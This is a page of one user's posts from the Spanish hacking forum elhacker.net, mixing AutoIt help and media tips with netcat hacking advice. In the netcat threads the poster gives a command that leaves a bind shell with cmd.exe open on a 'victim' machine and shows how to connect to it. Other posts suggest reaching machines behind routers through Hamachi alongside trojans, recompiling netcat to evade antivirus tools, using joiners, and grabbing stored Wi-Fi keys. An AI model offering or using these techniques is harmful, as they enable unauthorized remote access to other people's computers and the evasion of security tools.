elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Mensajes
Páginas: 1 [2] 3 4 5 6 7 8 9
11  Programación / Scripting / Re: Detector de U. Removibles 1.4 (para AutoIt3) en: 24 Julio 2008, 20:15 pm
mmm ignoro en que versión va, lo bajé hace poquito más de un año y no lo he movido dede entonces, puede ser mi compilador, va..
12  Programación / Scripting / Re: Detector de U. Removibles 1.4 (para AutoIt3) en: 24 Julio 2008, 14:19 pm
Código:
C:\Users\Administrador\Documents\dd.au3(12,46) : ERROR: StringCompare(): undefined function.
If StringCompare($rdrive[$indice], "a:", 1)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^
C:\Users\Administrador\Documents\dd.au3 - 1 error(s), 0 warning(s)

Estos son los errores que me tira ahora....
13  Programación / Scripting / Re: Detector de U. Removibles 1.2 (para AutoIt3) en: 23 Julio 2008, 15:26 pm
Yo también codeo en autoit pero este código me falló es decir tengo mi usb kingston de 2 gigas conectado y no me lo ha detectado...  :D :D

Por otra parte me gusta el código para hacer cositas con el usbe pero, checa a ver cual es la falla...
14  Seguridad Informática / Hacking / Re: Jugando con netcat en: 4 Julio 2008, 00:03 am
Si quieres un nc que no sea detectado buscate el código fuente y compilalo tu mismo, claro que hazle laos cambios pertinentes para que no te griten los AVs, anda estoy seguro que puedes..

Te advierto la compilación del nc tiene sus detalles no es tan fácil pero me imagino que podrás y si no pues pregunta..
15  Programación / Scripting / Re: Compiladores en Batch en: 24 Junio 2008, 06:03 am
Valora si no lo que necesitas más es un joiner, buscate el cactus joiner de Hendrix acá en este foro...

Por cierto yo uso QBF y el norton y el nod32 no lo pelan.. tal vez lo que detectan más es el ejcutable que adjuntas..
16  Seguridad Informática / Hacking / Re: Jugando con netcat en: 24 Junio 2008, 05:59 am
hola!! soy recien llegado a este foro, la verdad q encontre varias cosas muy interesantes, pero aqui mi inquietud:

Hay alguna manera de acceder con el netcat a una shell en una maquina remota que esta a la vez dentro de una lan, pero sin redireccionar los puertos del router manualmente?

El caso seria asi: tenemos una red de x maquinas, administradas por un router que les da ip y acceso a internet (claro...). Desde una maquina ajena a esta red, quiero abrir una shell de una de las maquinas de de la red, a traves de internet, pero, como todos sabemos, tengo q redireccionar los puertos en el router asi mi peticion es enviada directo a la maquina victima, sino se muere en el router. Como puedo hacer esto sin tener que crear las reglas manualmente? hay alguna manera con UPnP o algo de eso?

Muchisimas gracias a todos!

Usa hamachi, es un software que te permite crear redes vpn la única pega es que tendrás que instalarlo y asociar la pc a la que quieras acceder a una red virtual hamachi, el programa te dará una ip virtual a la que deberás conectarte desde el remoto, claro el remoto también deberá tener instalado el hamachi y pertenecer a la misma red que la otra, así que si dejas un puerto abierto con nc, podrás acceder comodamente desde el remoto con la ip virtual.

¿A poco creías que el Hamachi solo sirve para jugar online? Tiene mil y un uso si lo asocias a otros programas maravillosos como el nc, y es por decir algo, vnc y cualquier troyano que te abra un puerto..
17  Seguridad Informática / Wireless en Windows / Re: donde se guardan las claves en windows de las redes wifi en: 20 Mayo 2008, 01:37 am
http://files.filefront.com/wzcookexe/;6334447;/fileinfo.html

Wscook, te funcioná muy bien para XP, para los vista no mucho...  :D
18  Media / Multimedia / Re: utilizar la tv como monitor en: 19 Abril 2008, 16:40 pm
Tu salida TV o

ut si tienes una desktop, es altamente probalbe que se sencuentre en la tarjeta de vídeo, es decir en la parte trasera del cpu, busca la tarjeta de video que debe ser una pci o que sé yo, ahi a lado del conector del monitor lo verás, si no tienes tv/out, vete acostumbrando a ver tus pelis en el monitor, aunque por el modelo de tu tarjeta sí debes traerlo..

Por cierto, vieras que bien es ver los grandes documentales seriales de youtube desde tu tele. Es algo que no tiene precio.. :D :D :D :D
19  Seguridad Informática / Hacking / Re: Jugando con netcat en: 2 Abril 2008, 03:46 am
yo ya tengo este programa como hago para instalarlo por que nc.exe solo me sale la ventana donde tengo algo que dice

Cmd line: y al colo car algo de este lado se cierra la pantalla ayudenme

y disculpen la ignorancia Gracias por su tiempo...


Compadre, lo primero que tienes que hacer es leerte este post completito, ahi verás que es lo que pasa...

 :D :D

Bueno te ayudo, el nc no es un programa como piensas que se ejecuta y ya, es un programa de línea de comandos por lo que tendrás que aprender a usarlo abriendolo desde una consola y aprendiendote sus parámetros.

Código:
C:\Documents and Settings\Administrador.DESKTOP>nc -h
[v1.10 NT]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, stealth mode

        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

Código:
nc -lvvp 8080 -e cmd.exe
Sirve para dejar en la víctima un puerto abierto que al conectarlo te regale una hermosa shell.

para conectar al mismo puerto sería:

Código:
nc -vv 127.0.0.1 8080

La ip pues la tienes que cambiar por la de tu víctima..
20  Media / Multimedia / Re: Cual es el mejor Conversos de Video en: 26 Marzo 2008, 20:49 pm
Prueba el video convert master incluso hay una versión portable que es la que yo tengo, nunca me ha fallado y te convierte a casi todos los formatos multimedia habidos y por haber.

Claro también convierte archivos de dvd sin necesidad de violar candados puesto que lo que conviertes son los archivos de las pelis por capitulos es decir en la careta de video del dvd encuentras los archivos .sob (creo) o algo así, a mi nunca me ha dado problemas eso si para convertir un dvd tendría que convertir uno a uno los archivos sob que varian en numero según los capitulos en los que este cortada el dvd según sus episodios.

El fin de semana pase del dvd a avi comprimida con divxs la película El tirador, y le di seleccionar todos los archivos que resultaron ser 5 y me lo convirtió en menos de 45 minutos de 4 gigas a 1.2 gigas, la calidad insuperable, el audio te coge el default es decir el inglés o si la peli es en español pues ese será..

checalo...
Páginas: 1 [2] 3 4 5 6 7 8 9
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines